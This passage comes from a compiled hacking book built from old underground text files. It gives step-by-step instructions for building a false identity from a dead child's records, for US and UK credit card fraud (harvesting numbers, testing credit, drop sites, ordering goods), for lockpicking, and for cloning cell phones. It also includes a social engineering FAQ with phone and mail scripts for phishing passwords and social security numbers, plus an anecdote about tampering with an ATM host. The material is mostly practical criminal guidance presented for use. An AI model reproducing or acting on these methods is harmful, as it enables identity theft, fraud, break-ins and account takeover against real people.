|___|->>-| |->>-|____| The B of A ATM's are connected through dedicated lines to a host computer as the Bishop said. However, for maintenance purposes, there is at least one separate dial-up line also going to that same host computer. This guy basically bs'ed his way over the phone till he found someone stupid enough to give him th number. After finding that, he had has Apple hack at the code. Simple. Step 2: He had a friend go to an ATM with any B of A ATM card. He stayed at home with the Apple connected to the host. When his friend inserted the card, the host displayed it. The guy with the Apple modified the status & number of the card directly in the host's memory. He turned the card into a security card, used for testing purposes. At that point, the ATM did whatever it's operator told it to do. The next day, he went into the bank with the $2000 he received, talked to the manager and told him every detail of what he'd done. The manager gave him his business card and told him that he had a job waiting for him when he got out of school. Now, B of A has been warned, they might have changed the system. On the other hand, it'd be awful expensive to do that over the whole country when only a handful of people have the resources and even less have the intelligence to duplicate the feat. Who knows? How To Create A New Indentity You might be saying, "Hey Glitch, what do I need a new identity for?" The answer is simple. You might want to go buy liquor somewhere, right? You might want to go give the cops the false name when you get busted so you keep your good name, eh? You might even want to use the new identity for getting a P.O. Box for carding. Sure! You might even want the stuff for renting yourself a VCR at some dickless loser of a convenience store. Here we go: Mail:mtahirzahid@yahoo.com

Page 386


Power Of Hacking速 Getting a new ID isn't always easy, no one said it would be. By following these steps, any bozo can become a new bozo in a coupla weeks. STEP 1 The first step is to find out who exactly you'll become. The most secure way is to use someone's ID who doesn't use it themselves. The people who fit that bill the best are dead. As an added bonus they don't go complaining one bit. Go to the library and look through old death notices. You have to find someone who was born about the same time as you were, or better yet, a year or two older so you can buy booze, etc. You should go back as far as you can for the death because most states now cross index deaths to births so people can't do this in the future. The cutoff date in Wisconsin is 1979, folks in this grand state gotta look in 1978 or earlier. Anything earier there is cool. Now, this is the hardest part if you're younger. Brats that young happen to be quite resilient, takin' falls out of three story windows and eating rat poison like its Easter candy, and not a scratch or dent. There ain't many that die, so ya gotta look your ass off. Go down to the library and look up all the death notices you can, if it's on microfilm so much the better. You might have to go through months of death notices though, but the results are well worth it. You gotta get someone who died locally in most instances: the death certificate is filed only in the county of death. Now you go down to the county courthouse in the county where he died and get the death certificate, this will cost you around $3-$5 depending on the state you're in. Look at this hunk of paper, it could be your way to vanish in a clould of smoke when the right time comes, like right after that big scam. If You're lucky, the slobs parents signed him up with social security when he was a snot nosed brat. That'll be another piece of ID you can get. If not, thats ok too. It'll be listed on the death certificate if he has one. If you're lucky, the stiff was born locally and you can get his birth certificate right away. STEP 2 Now check the place of birth on the death certificate, if it's in Mail:mtahirzahid@yahoo.com

Page 387


Power Of Hacking速 the same place you standing now you're all set. If not, you can mail away for one from that county but its a minor pain and it might take a while to get, the librarian at the desk has listings of where to write for this stuff and exactly how much it costs. Get the Birth cirtificate, its worth the extra money to get it certified because thats the only way some people will accept it for ID. When yur gettin this stuff the little forms ask for the reason you want it, instead of writing in "Fuck you", try putting in the word "Geneology". They get this all the time. If the Death certificate looks good for you, wait a day or so before getting the certified birth certificate in case they recognize someone wanting it for a dead guy. STEP 3 Now your cookin! You got your start and the next part's easy. Crank out your old Dot matrix printer and run off some mailing labels addressed to you at some phony address. Take the time to check your phony address that there is such a place. Hotels that rent by the month or large apartment buildings are good, be sure to get the right zip code for the area. These are things that the cops might notice that will trip you up. Grab some old junk mail and paste your new lables on them. Now take them along with the birth certificate down to the library. Get a new library card. If they ask you if you had one before say that you really aren't sure because your family moved around alot when you were a kid. Most libraries will allow you to use letters as a form of ID when you get your card. If they want more give them a sob story about how you were mugged and got your wallet stolen with all your identification. Your card should be waiting for you in about two weeks. Most libraries ask for two forms of ID, one can be your trusty Birth Certificate, and they do allow letters addressed to you as a second form. STEP 4 Now you got a start, it isn't perfect yet, so let's continue. You should have two forms of ID now. Throw away the old letters, or better yet stuff them inside the wallet you intend to use with this stuff. Mail:mtahirzahid@yahoo.com

Page 388


Power Of Hacking速 Go to the county courthouse and show them what nice ID you got and get a state ID card. Now you got a picture ID. This will take about two weeks and cost about $5, its well worth it. STEP 5 If the death certificate had a social security number on it you can go out and buy one of those metal SS# cards that they sell. If it didn't, then you got all kinds of pretty ID that shows exactly who you are. If you don't yet have an SS#, Go down and apply for one, these are free but they could take five or six weeks to get, Bureaucrats you know... You can invent a SS# too if ya like, but the motto of 'THE WALKING GLITCH' has always been "Why not excellence?". STEP 6 If you want to go whole hog you can now get a bank account in your new name. If you plan to do alot of traveling then you can put alot of money in the account and then say you lost the account book. After you get the new book you take out all the cash. They'll hit you with a slight charge and maybe tie-up your money some, but if you're ever broke in some small town that bank book will keep you from being thrown in jail as a vagrant. ALL DONE? So kiddies, you got ID for buying booze, but what else? In some towns (the larger the more likely) the cops if they catch you for something petty like shoplifting stuff under a certain dollar amount, will just give you a ticket, same thing for pissing in the street. Thats it! No fingerprints or nothing, just pay the fine (almost always over $100) or appear in court. Of course they run a radio check on your ID, you'll be clean and your alter-ego gets a blot on his record. Your free and clear. Thats worth the price of the trouble you've gone through right there. If your smart, you'll toss that ID away if this happens, or better yet, tear off your picture and give the ID to someone you don't like, maybe they'll get busted with it. Mail:mtahirzahid@yahoo.com

Page 389


Power Of Hacking速 If you're a working stiff, here's a way to stretch your dollar. Go to work for as long as it takes to get unemployment and then get yourself fired. Go to work under the other name while your getting the unemployment. With a couple of sets of ID, you can live like a king. These concepts for survival in the new age come to you compliments of THE WALKING GLITCH. First release of this phile 7/7/88. Lockpicking for the EXTREME beginner...

This is really a good method for opening doors that are locked. The only problem with this, though, is that it only works for outward opening doors. Ok, here we go.... 1) Realize you are not working with the actual lock, but that thing that sticks between the door and the wall. 2) See how that thing is curved on one side? Well, that is what we will be making use of. 3) Acquire a large paper-clip. If it is too short, it won't work. You have to also have a shoelace. Now, onto the construction... 4) Straighten the paper-clip. 5) Loop one end of the paper clip around the shoelace. The shoelace should be about 4/5 on one side of the clip and 1/5 on the other. Let's see if I can draw it. ------------------************************************* -* *******

--- is the paper clip *** is the shoelace That's not very good, but I hope you get the picture. Mail:mtahirzahid@yahoo.com

Page 390


Power Of Hacking速

6) All you have to do now is curve the paper clip (no, I won't draw it) 7) With the curved paper-clip, stick it between the door and the wall, behind the metal thing that sticks between. 8) Feed it through with you hand, until you can grip both sides of the shoelace. 9) Now, simply pull the lace and the door at the same time, and VIOLA! the door is open. I prefer this over regular lock-picking if the door opens outward, because it is a lot quicker. Lock picking can take 5 minutes... When done correctly this only takes 30 seconds! So, if you can, use this. OPENING COMBO LOCKS

First of all, let me tell you about the set-up of a lock. When the lock is locked, there is a curved piece of metal wedged inside the little notch on the horseshoe shaped bar (known as the shackle) that is pushed in to the lock when you lock it. To free this wedge, you usually have to turn the lock to the desired combination and the pressure on the wedge is released therefore letting the lock open. I will now tell you how to make a pick so you can open a lock without having to waste all that time turning the combination (this also helps when you don't know the combination to begin with). To bypass this hassle, simply take a thinned hairpin (file it down) or a opened out piece of a collapsing antenna (the inside diameter of the curved piece of metal should be the same as the diameter of the shackle- if the metal is too thick, use fine sandpaper to thin it down. Once you have your hair pin (make sure it's metal), take the ridged side and break it off right before it starts to make a U-turn onto the straight Mail:mtahirzahid@yahoo.com

Page 391


Power Of Hacking速 side. The curved part can now be used as a handle. Now, using a file, file down the other end until it is fairly thin. You should do this to many hairpins and file them so they are of different thicknesses so you can jimmy various locks. Look at a lock to see which side the lock opens from. If you can't tell, you will just have to try both sides. When ya find out what side it opens from, , take the lock pick and stick the filed end into the inside of the horseshoe-shaped bar on whichever side the lock opens from. Now, put pressure on the handle of the lock pick (pushing down, into the crack) and pull the lock up and down. The lock will then open because the pick separated the wedge and the notch allowing it to open. Also, this technique works best on American locks. I have never picked a Master lock before because of the shape a pressure of the wedge but if anyone does it, let me know how long it took. Also, the Master lock casing is very tight so ya can't get the shim in. Credit Card Fraud: ----------------For most of you out there, money is hard to come by. Until now: With the recent advent of plastic money (credit cards), it is easy to use someone else's credit card to order the items you have always desired in life. The stakes are high, but the payoff is worth it. Step One: Getting the credit card information First off, you must obtain the crucial item: someone's credit card number. The best way to get credit card numbers is to take the blue carbons used in a credit card transaction at your local department store. These can usually be found in the garbage can next to the register, or for the more daring, in the garbage dumpster behind the store. But, due to the large amount of credit card fraud, many stores have opted to use a carbonless transaction Mail:mtahirzahid@yahoo.com

Page 392


Power Of Hacking速 sheet, making things much more difficult. This is where your phone comes in handy. First, look up someone in the phone book, and obtain as much information as possible about them. Then, during business hours, call in a very convincing voice - "Hello, this is John Doe from the Visa Credit Card Fraud Investigations Department. We have been informed that your credit card may have been used for fraudulent purposes, so will you please read off the numbers appearing on your Visa card for verification." Of course, use your imagination! Believe it or not, many people will fall for this ploy and give out their credit information. Now, assuming that you have your victim's credit card number, you should be able to decipher the information given. Step Two: Recognizing information from carbon copies Card examples: [American Express] XXXX XXXXXX XXXXX MM/Y1 THRU MM/Y2 JOE SHMOE [American Express] XXXX XXXXXX XXXXX MM/Y1 THRU MM/Y2 JOE SHMOE Explanation: MM/Y1 is the date the card was issued, and MM/Y2 is the expiration date. The American Express Gold Card has numbers XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5000.00, even if the card holder is broke. [Mastercard] Mail:mtahirzahid@yahoo.com

Page 393


Power Of Hacking速 5XXX XXXX XXXX XXXX XXXX AAA DD-MM-YY MM/YY JOE SHMOE Explanation: XXXX in the second row may be asked for during the ordering process. The first date is when the card was new, and the second is when the card expires. The most frequent number combination used is 5424 1800 XXXX XXXX. There are many of these cards in circulation, but many of these are on wanted lists, so check these first. [Visa] 4XXX XXX(X) XXX(X) XXX(X) MM/YY MM/YY*VISA JOE SHMOE Explanation: Visa is the most abundant card, and is accepted almost everywhere. The "*VISA" is sometimes replaced with "BWG", or followed with a special code. These codes are as follows: [1] MM/YY*VISA V - Preferred Card [2] MM/YY*VISA CV - Classic Card [3] MM/YY*VISA PV - Premier Card Preferred Cards are backed with money, and are much safer to use. Classic Cards are newer, harder to reproduce cards with decent backing. Premier Cards are Classic Cards with Preferred coverage. Common numbers are 4448 020 XXX XXX, 4254 5123 6000 XXXX, and 4254 5123 8500 XXXX. Any 4712 1250 XXXX XXXX cards are IBM Credit Union cards, and are risky to use, although they are usually covered for large purchases. Step Three: Testing credit You should now have a Visa, Mastercard, or American Express Mail:mtahirzahid@yahoo.com

Page 394


Power Of Hacking速 credit card number, with the victim's address, zip code, and phone number. By the way, if you have problems getting the address, most phone companies offer the Address Tracking Service, which is a special number you call that will give you an address from a phone number, at a nominal charge. Now you need to check the balance of credit on the credit card (to make sure you don't run out of money), and you must also make sure that the card isn't stolen. To do this you must obtain a phone number that businesses use to check out credit cards during purchases. If you go to a department store, watch the cashier when someone makes a credit card purchase. He/she will usually call a phone number, give the credit information, and then give what is called a "Merchant Number". These numbers are usually written down on or around the register. It is easy to either find these numbers and copy them, or to wait until they call one in. Watch what they dial and wait for the 8 digit (usually) merchant number. Once you call the number, in a calm voice, read off the account number, merchant number, amount, and expiration date. The credit bureau will tell you if it is ok, and will give you an authorization number. Pretend you are writing this number down, and repeat it back to them to check it. Ignore this number completely, for it serves no real purpose. However, once you do this, the bank removes dollars equal to what you told them, because the card was supposedly used to make a purchase. Sometimes you can trick the operator by telling her the customer changed his mind and decided not to charge it. Of course, some will not allow this. Remember at all times that you are supposed to be a store clerk calling to check out the card for a purchase. Act like you are talking with a customer when he/she "cancels". Step Four: The drop Once the cards are cleared, you must find a place to have the package sent. NEVER use a drop more than once. The following are typical drop sites: [1] An empty house Mail:mtahirzahid@yahoo.com

Page 395


Power Of Hacking速

An empty house makes an excellent place to send things. Send the package UPS, and leave a note on the door saying, "UPS. I work days, 8 to 6. Could you please leave the package on the back door step?" You can find dozens of houses from a real estate agent by telling them you want to look around for a house. Ask for a list of twenty houses for sale, and tell them you will check out the area. Do so, until you find one that suits your needs. [2] Rent A Spot U-Haul sometimes rents spaces where you can have packages sent and signed for. End your space when the package arrives. [3] People's houses Find someone you do not know, and have the package sent there. Call ahead saying that "I called the store and they sent the package to the wrong address. It was already sent, but can you keep it there for me?" This is a very reliable way if you keep calm when talking to the people. Do NOT try post office boxes. Most of the time, UPS will not deliver to a post office box, and many people have been caught in the past attempting to use a post office box. Also, when you have determined a drop site, keep an eye on it for suspicious characters and cars that have not been there before. Step Five: Making the transaction You should now have a reliable credit card number with all the necessary billing information, and a good drop site. The best place to order from is catalogues, and mail order houses. It is in your best interest to place the phone call from a pay phone, especially if it is a 1-800 number. Now, when you call, don't try to disguise your voice, thinking you will trick the Mail:mtahirzahid@yahoo.com

Page 396


Power Of Hacking速 salesperson into believing you are an adult. These folks are trained to detect this, so your best bet is to order in your own voice. They will ask for the following: name, name as it appears on card, phone number, billing address, expiration date, method of shipping, and product. Ask if they offer UPS Red shipping (next day arrival), because it gives them less time to research an order. If you are using American Express, you might have a bit of a problem shipping to an address other than the billing address. Also, if the salesperson starts to ask questions, do NOT hang up. Simply talk your way out of the situation, so you won't encourage investigation on the order. If everything goes right, you should have the product, free of charge. Insurance picks up the tab, and no one is any wiser. Be careful, and try not to order anything over $500. In some states, UPS requires a signature for anything over $200, not to mention that anything over $200 is defined as grand theft, as well as credit fraud. Get caught doing this, and you will bite it for a couple of years. Good luck! Cellular Phreaking The cellular/mobile phone system is one that is perfectly set up to be exploited by phreaks with the proper knowledge and equipment. Thanks to deregulation, the regional BOC's (Bell Operating Companies) are scattered and do not communicate much with each other. Phreaks can take advantage of this by pretending to be mobile phone customers whose "home base" is a city served by a different BOC, known as a "roamer". Since it is impractical for each BOC to keep track of the customers of all the other BOC's, they will usually allow the customer to make the calls he wishes, often with a surcharge of some sort. The bill is then forwarded to the roamer's home BOC for collection. However, it is fairly simple (with the correct tools) to create a bogus ID number for your mobile phone, and pretend to be a roamer from some other city and state, that's "just visiting". When your BOC tries to collect for the calls from your alleged "home BOC", they will discover you are not a real customer; but by then, you can create an entirely new electronic Mail:mtahirzahid@yahoo.com

Page 397


Power Of Hacking速 identity, and use that instead. How does the cellular system know who is calling, and where they are? When a mobile phone enters a cell's area of transmission, it transmits its phone number and its 8 digit ID number to that cell, who will keep track of it until it gets far enough away that the sound quality is sufficiently diminished, and then the phone is "handed off" to the cell that the customer has walked or driven into. This process continues as long as the phone has power and is turned on. If the phone is turned off (or the car is), someone attempting to call the mobile phone will receive a recording along the lines of "The mobile phone customer you have dialed has left the vehicle or driven out of the service area." When a call is made to a mobile phone, the switching equipment will check to see if the mobile phone being called is "logged in", so to speak, or present in one of the cells. If it is, the call will then act (to the speaking parties) just like a normal call - the caller may hear a busy tone, the phone may just ring, or the call may be answered. How does the switching equipment know whether or not a particular phone is authorized to use the network? Many times, it doesn't. When a dealer installs a mobile phone, he gives the phone's ID number (an 8 digit hexadecimal number) to the local BOC, as well as the phone number the BOC assigned to the customer. Thereafter, whenever a phone is present in one of the cells, the two numbers are checked - they should be registered to the same person. If they don't match, the telco knows that an attempted fraud is taking place (or at best, some transmission error) and will not allow calls to be placed or received at that phone. However, it is impractical (especially given the present state of deregulation) for the telco to have records of every cellular customer of every BOC. Therefore, if you're going to create a fake ID/phone number combination, it will need to be "based" in an area that has a cellular system (obviously), has a different BOC than your local area does, and has some sort of a "roamer" agreement with your local BOC. How can one "phreak" a cellular phone? There are three general areas when phreaking cellular phones; using one you found in an unlocked car (or an unattended walk-about model), modifying your own chip set to look like a different phone, or recording the phone number/ID number combinations sent by other local cellular phones, and using those as your own. Most Mail:mtahirzahid@yahoo.com

Page 398


Power Of Hacking速 cellular phones include a crude "password" system to keep unauthorized users from using the phone - however, dealers often set the password (usually a 3 to 5 digit code) to the last four digits of the customer's mobile phone number. If you can find that somewhere on the phone, you're in luck. If not, it shouldn't be TOO hard to hack, since most people aren't smart enough to use something besides "1111", "1234", or whatever. If you want to modify the chip set in a cellular phone you bought (or stole), there are two chips (of course, this depends on the model and manufacturer, yours may be different) that will need to be changed - one installed at the manufacturer (often epoxied in) with the phone's ID number, and one installed by the dealer with the phone number, and possible the security code. To do this, you'll obviously need an EPROM burner as well as the same sort of chips used in the phone (or a friendly and unscrupulous dealer!). As to recording the numbers of other mobile phone customers and using them; as far as I know, this is just theory... but it seems quite possible, if you've got the equipment to record and decode it. The cellular system would probably freak out if two phones (with valid ID/phone number combinations) were both present in the network at once, but it remains to be seen what will happen. Exchange Scanning

Almost every exchange in the bell system has test #'s and other "goodies" such as loops with dial-ups. These "goodies" are usually found betweed 9900 and 9999 in your local exchange. If you have the time and initiative, scan your exchange and you may become lucky! Here are some findings in the 914-268 exchange:

9900 - ANI 9901 - ANI 9927 - OSC. TONE (POSSIBLE TONE SIDE OF A LOOP) 9936 - VOICE # TO THE TELCO CENTRAL OFFICE 9937 - VOICE # TO THE TELCO CENTRAL OFFICE 9941 - COMPUTER (DIGITAL VOICE TRANSMISSION?) 9960 - OSC. TONE (TONE SIDE LOOP) MAY ALSO BE A COMPUTER IN SOME Mail:mtahirzahid@yahoo.com

Page 399


Power Of HackingÂŽ EXCHANGES 9961 - NO RESPONSE (OTHER END OF LOOP?) 9962 - NO RESPONSE (OTHER END OF LOOP?) 9963 - NO RESPONSE (OTHER END OF LOOP?) 9966 - COMPUTER (SEE 9941) 9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYS Most of the numbers between 9900 & 9999 will ring or go to a "what #, please?" operator. U.K. CREDIT CARD FRAUD U.K. credit card fraud is a lot easier than over in the States. The same basic 3 essentials are needed 1...A safehouse. 2...Credit card numbers with Xp date and address. 3...Good suppliers of next day delivery goods. 1...The Safehouse The safehouse should be on the ground floor, so as not to piss off the delivery man when he comes to drop off your freshly stolen gear. If he has to go up 10 flights in a complete dive and some 14 year old kid signs for an A2000 then he's gonna wonder! Make sure there are no nosey neighbours, a good area is one full of yuppies 'cos they all go to work during daytime. Safehouses are usually obtained by paying a month's rent in advance or putting down a deposit of say, Ĺ“200. Either that or break into a place and use that. 2...Credit Card Numbers. The card number, expiry date, start date (if possible), full name (including middle inital), phone number and full address with postcode are ideal. If you can only get the sirname, and no postcode, you shouldn't have any real hassle. Just say you moved recently to your new address. Phone number is handy, if it just rings and rings but if it doesn't, then make sure it's ex-directory. You CANNOT get away with giving them a bullshit phone number. Some fussy companies want phone numbers just to cross-check on CARDNET but generally it's not Mail:mtahirzahid@yahoo.com

Page 400


Power Of Hacking® needed. To recap, here's a quick check-list...

1.Card number and Xpiry date. 2.Name and address of card holder. 3.First name/initials (OPTIONAL) 4.Start date (OPTIONAL) 5.Postcode (OPTIONAL) 6.Phone number (OPTIONAL) If you have all 6, then you shouldn't have any hassle. Start date is the rarest item you could be asked for, postcode and initals being more common. If you are missing 3-6 then you need one helluva smoothtalking bastard on the phone line!!!! 3...The Ordering Not everyone can order œ1000's of stuff - it's not easy. You have to be cool, smooth and have some good answers to their questions. I advise that you only order up to œ500 worth of stuff in one go, but if you have details 1-6 and the phone number will NOT be answered from 95.30 P.M. then go up to œ1000 (make sure it's a GOLD card!). When getting ready to order make sure you have at least 3 times the amount of suppliers you need e.g.if you want to card 5 hard-drives, make sure you have 15 suppliers. A lot of the time, they are either out stock, can't do next day delivery or won't deliver to a different address. Quick check list of what you must ask before handing over number 1.Next day delivery, OK? 2.Ordered to different address to card, OK? 3.Do you have item in stock (pretty obvious, eh?) Make sure you ask ALL of these questions before handing over your precious number. Excuses... Usual excuses for a different address are that it's a present or you're on business here for the next 5 weeks etc. Any old bullshit Mail:mtahirzahid@yahoo.com

Page 401


Power Of Hacking® why it won't go to the proper address. WARNING!*******Invoices!*******WARNING! Invoices are sometimes sent out with the actual parcel but they are also sent out to the card owners (why do you think they need the address for?) so using a safehouse for more than 2 days is risky. A 1 day shot is safe, if they catch on then they'll stop the goods before getting a search warrant. Credit Limits... Limits on cards reach from œ500 to œ4000 on Gold cards. Your average card will be about œ1000-œ1500. It takes a while to build up a good credit rating in order to have large limits so don't think every card will hold 12 IBM 386's! Visa and Access are always used - American Xpress etc. are USELESS. Access = Eurocard, Mastercard (begins with 5) Visa = (begins with 4, 16 digit is a Gold) A general rule is, always confirm an order to make sure credit is cleared. As the month goes on, credit is used up - the bad times are from 27th - 3rd which is when all the bills come in. Best time to card is around 11th or 12th, when the poor guy has paid off his last bill so you can run up a new one (he, he, he!). Ideal items to card... The best stuff is always computer hard-ware as it's next-day. Amigas, ST's, PC's - anything really. Blank discs are a waste of time, they're too heavy. Xternal drives, monitors - good stuff basically. Don't order any shit like VCR's, hi-fi, video-cameras, music keyboards, computer software, jewerely or anything under œ300. You'll find the listed items are difficult to get next day delivery and usually won't deliver to a different address - bastards, eh? You're wasting your time with little items under œ300, try to keep deliveries under 10 a day.

Mail:mtahirzahid@yahoo.com

Page 402


Power Of Hacking速 The drop.... Two ways of doing the drop 1.Sign for all the gear (make sure you're there between 9.00 and 5.30 P.M.) 2.Don't turn up till around 6.30 P.M. and collect all the cards that the delivery man has left. These usually say 'you were out at XX time so could you please arrange new time for delivery or pick up from our depot'. In that case, piss off to the depot and get all the gear (need a big car!). Remember, carding is ILLEGAL kiddies, so don't do it unless you're going to cut me on it!!!! THE COMPLETE SOCIAL ENGINEERING FAQ! "There's a sucker born every minute." PT Barnum "Don't touch me, sucka." Mr. T By bernz (official sponsor of the 1996 Croatian Olympic Men's Synchronized Swimming Team) with shoutouts to: The Genocide2600, Silicon Toad and your big fat mama. DISCLAIMER!!!!! THIS INFORMATION IS HERE FOR THE SOLE PURPOSE OF ENLIGHTENMENT! IF YOU USE IT AND GET CAUGHT, NO ONE IS TO BLAME BUT YOUR OWN IDIOTIC ASS!!! SECTION I: INTRO 1.1 What is social engineering? 1.2 Why is there a FAQ about it? 1.3 Who cares? 1.4 Basic intro and other shit. SECTION II: PHONE SOCIAL ENGINEERING 2.1 Basics 2.2 Equipment Mail:mtahirzahid@yahoo.com

Page 403


Power Of Hacking速 2.3 Phreak stuff 2.4 Technique SECTION III: SNAIL MAIL 3.1 Is Snail Mail acutally usefull for something? 3.2 Equipment 3.3 Technique SECTION IV: INTERNET 4.1 Isn't this just hacking? SECTION V: LIVE, FROM NEW YORK... 5.1 In person? 5.2 Equipment 5.3 I'm wearing a suit, now what? SECTION VI: PUTTING IT TOGETHER A sample problem 1.1 What is social engineering? The hacker's jargon dictionary says this: Social Engineering: n. Term used among crackers and samurai for cracking techniques that rely on weaknesses in wetware rather than software; the aim is to trick people into revealing passwords or other information that compromises a target system's security. Classic scams include phoning up a mark who has the required information and posing as a field service tech or a fellow employee with an urgent access problem. This is true. Social engineering, from a narrow point of view, is basically phone scams which pit your knowledge and wits against another human. This technique is used for a lot of things, such as gaining passwords, keycards and basic information on a system or organization. 1.2 Why is there a FAQ about it?

Mail:mtahirzahid@yahoo.com

Page 404


Power Of Hacking速 Good question. I'm glad I asked. I made this for a few reasons. The first being that Social Engineering is rarely discussed. People discuss cracking and phreaking a lot, but the forum for social engineering ideas is stagnant at best. Hopefully this will help generate more discussion. I also find that social engineering specialists get little respect, this will show ignorant hackers what we go through to get passwords. The last reason is honestly for a bit of Neophyte training. Just another DOC for them to read so I don't get bogged with email. 1.3 Who Cares? To Neophytes: You should, you little fuck. If you think the world of computers and security opens up to you through a keyboard and your redbox then you are so fucking dead wrong. Good. Go to your school, change your grades and be a "badass" hacker. Hacking, like real life, exists in more than just your system. You can't use proggies to solve everything. I don't mean to sound upset, but jesus, have a bit of innovation and a sense of adventure. To Experienced Hackers: Just thought it would help a bit. 1.4 Basic intro and shit for this document. This FAQ will address phone techniques, mail techniques, internet techniques and live techniques. I will discuss Equipment and will put some scripts of actual conversations from social engineering. There are times I might discuss things that cross the line into phreaking or traditional hacking. Don't send me email and say that my terms aren't correct and blahblahblah isn't social engineering. I use them for convenience and lack of better methods of explanation (eg I might say "dumpster diving is a form of social engineering") Don't get technical. SECTION II: PHONES 2.1 Basics This is probably the most common social engineering technique. It's quick, painless and the lazy person can do it. No movement, other than fingers Mail:mtahirzahid@yahoo.com

Page 405


Power Of Hacking速 is necessary. Just call the person and there you go. Of course it gets more complicated than that. 2.2 What Equipment is necessary for this? The most important peice of hardware is your wetware. You have to have a damn quick mind. As far as physical Equipment goes, a phone is necessary. Do not have call waiting as this will make you sound less believeable. There is no real reason why this does but getting beeped in the middle of a scam just throws off the rhythym. The phone should be good quality and try to avoid cordless, unless you never get static on them. Some phones have these great buttons that make office noise in the background. Caller ID units are helpful if you pull off a scam using callback. You don't want to be expecting your girlfriend and pick up the phone and say, "I wanna fuck you" only to find out it was an IBM operator confirming your identity. Operators don't want to have sex with you and so your scam is fucked. Besides, call ID units are just cool because you can say, "Hello, <blank>" when someone calls. The Radio Slut carries these pretty cheap. Something I use is a voice changer. It makes my voice sound deeper than James Earl Jones or as high as a woman. This is great if you can't change your pitch very well and you don't want to sound like a kid (rarely helpful). Being able to change gender can also be very helpful (see technique below). I got one for a gift from Sharper Image. This means that brand will cost quite a bit of cash, but it's very good quality. If anyone knows of other brand of voice changers, please inform me.

2.3 Phreaking and Social engineering? Social Engineering and phreaking cross lines quite a lot. The most obvious reasons are because phreaks need to access Ma Bell in other ways but computers. They use con games to draw info out of operators. Redboxing, greenboxing and other phreaking techniques can be used to avoid the phone bills that come with spending WAAAAYYY too much time on the phone trying to scam a password. Through the internet, telnetting to california is free. Through ma bell, it's pricey. I say making phone calls from payphones is fine, but beware of background noise. Sounding like you're Mail:mtahirzahid@yahoo.com

Page 406


Power Of Hacking速 at a payphone can make you sound pretty unprofessional. Find a secluded phone booth to use. 2.4 How do I pull off a social engineering with a phone? First thing is find your mark. Let's say you want to hit your school. Call the acedemic computer center (or its equivelent). Assuming you already have an account, tell them you can't access your account. At this point they might do one of two things. If they are stupid, which you hope they are, they will give you a new password. Under that precept, they'll do that for most people. Simply finger someone's account, specifically a faculty member. At this point, use your voice changer when you call and imitate that teacher the best you can. People sound different over the phone, so you'll have a bit of help. Try to make the person you're imitating a female (unless you are a female). Most of the guys running these things will give anything to a good sounding woman because the majority of the guys running minicomputers are social messes. Act like a woman (using voice changer) and you'll have anything you want from them. Most of the time the people working an area will ask for some sort of verification for your identity, often a social security number. You should find out as much information about a mark as you can (see mail and live techniques) before you even think about getting on the phone. If you say you are someone you aren't and then they ask you for verification you don't have, they will be suspicious and it will be infinitely more difficult to take that system. Once again for idiots: DO NOT TRY TO SOCIAL ENGINEER WITHOUT SUFFICIENT INFORMATION ON YOUR MARK! Once people believe you are someone, get as much as you can about the system. Ask for your password, ask for telnet numbers, etc. Do not ask for too much as it will draw suspicion. You must sound like a legitimate person. Watch your mark. Learn to speak like him/her. Does that person use contractions? Does that person say "like" a lot? Accent? Lisp? The best way for observation of speech is to call the person as a telemarketer or telephone sweepstakes person. Even if they just tell you they Mail:mtahirzahid@yahoo.com

Page 407


Power Of Hacking速 can't talk to you, you can learn a quite a bit from the way they speak. If they actually want to speak to you, you can use that oppurtunity to glean information on them. Tell them they won something and you need their address and social security number and other basic info. WARNING: ABUSING SOMEONE'S SOCIAL SECURITY NUMBER IS ILLEAGAL!!! DON'T SAY YOU WEREN'T WARNED!!! SECTION III: SNAIL MAIL 3.1 Is snail mail really useful? Yes. It actually is. Snail mail is not tapped. Snail mail is cheap. Snail mail is readily available. But how can you use it in social engineering. As I said above, it's difficult to find systems that just let you call with no verification. They do exist but they are rare. So therefore you need info on your mark and the mark's system. You can try the telemarketing scam, but that isn't always succesful, as people do not trust telemarketers. For some reason, though, people trust the written word. Morons. People will respond to sweepstakes forms with enthusiasm and will give you whatever info you want on it. That's why snail mail is so great. 3.2 What do I need? Obviously you need mail "equpiment" which includes stamps and envelopes. But subtle things are required as well. You're going to want to have return address stickers that include "your company's" logo and name. This can be procured at places like Staples, Office Max and other stores for a realitively cheap price. The most important part to mail social engineering is a layout program. WordPerfect is okay, but I prefer QuarkXpress or PageMaker. These programs are not cheap, but can be used for plenty of other applications and are well worth their price. IF YOU GET IT PIRATED, I DON'T ADVOCATE THAT ACTION. With these DTP programs, you can emmulate a tottaly professional document. More about this below. A private mailbox is good. If you want to be very professional, get a PO box. I'm in a Mail:mtahirzahid@yahoo.com

Page 408


Power Of Hacking速 band, so I use that PO box. They can be rented at a variety of places, including Post Offices and MailBoxes, etc. for low fees. Share the cost with others for great cost effectiveness. 3.3 I've got the stuff, now what? What is your mark? Generally, for a mail social engineer, your mark is going to be a large group of people. Thus, your mail should look like a mass mail sweepstakes. Use computer labels and the like to keep this illusion. You need a list of employees from that company and their addresses. Look at the junk mail in your mail. Sweepstakes forms, mail-in orders, etc. Try tofake that look. Something with very few lines to fill in (but with your vital info on them). A watermark is always a good touch for these documents. Use the fonts a business would use and word your letters in a similar fashion. Illusion is everything. The information on these should include social security numbers. Another good idea is to say that you'll need a password to verify the prize with a voice call. Hopefully it'll be the same as their net account password. It usually is. Yes, people actually fall for this stuff. To make someone fill these out, they must be concise and visually appealling. A person filling these out cannot be hasseled with difficult choices. Check Boxes are also a nice effect. These must look believeable. Credibility is everything with social engineering. I cannot stress that enough. I will soon realease examples, although you should be original and make some on your own. Now, after stamping and addressing your letters, send them out and wait. Soon you should receive some answers. At this point, use a standard phone social engineering. Social Security numbers are the most common verification. If you find that you need some other form, send out letters with that information. For example, sometimes mother's maiden name is used. SECTION IV: INTERNET 4.1 Isn't this just a form of hacking? Mail:mtahirzahid@yahoo.com

Page 409


Power Of Hacking速

